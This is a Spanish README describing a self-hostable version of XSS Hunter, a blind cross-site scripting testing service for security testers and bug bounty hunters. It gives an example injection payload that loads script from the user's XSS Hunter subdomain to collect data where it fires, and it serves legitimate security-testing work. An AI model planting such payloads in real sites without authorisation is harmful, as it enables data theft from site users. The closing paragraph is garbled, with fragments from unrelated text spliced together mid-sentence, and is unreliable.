
El servicio XSS Hunter - una versión portátil de XSSHunter.com
Ver aquí para más información: https://github.com/mandatoryprogrammer/xsshunter-express
Esta es una versión portátil del código fuente que se ejecuta en https://xsshunter.com. Está diseñada para instalarse fácilmente en cualquier servidor para profesionales de seguridad y cazadores de recompensas que deseen probar XSS de una manera mucho más poderosa.
Si no deseas configurar este software y prefieres empezar a probar directamente, consulta https://xsshunter.com .
Por favor, consulta https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ para obtener información sobre cómo configurar XSS Hunter en tu propio servidor.
Al registrarte, crearás un dominio corto especial como yoursubdomain.xss.ht que identifica tus vulnerabilidades XSS y aloja tu payload. Luego usas este subdominio en tus pruebas XSS, utilizando intentos de inyección como "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter servirá automáticamente sondas XSS y recopilará la información resultante cuando se activen.
crossdomain.xml incorrectas en sistemas internos a los que normalmente no se podría acceder./app y guarda la página como una aplicación web en el escritorio de tu iPhone.Todo el código fue creado por mí y (por esa razón) probablemente no sea una buena práctica y definitivamente necesita optimización/limpieza. ¡Cualquier pull request es bienvenido!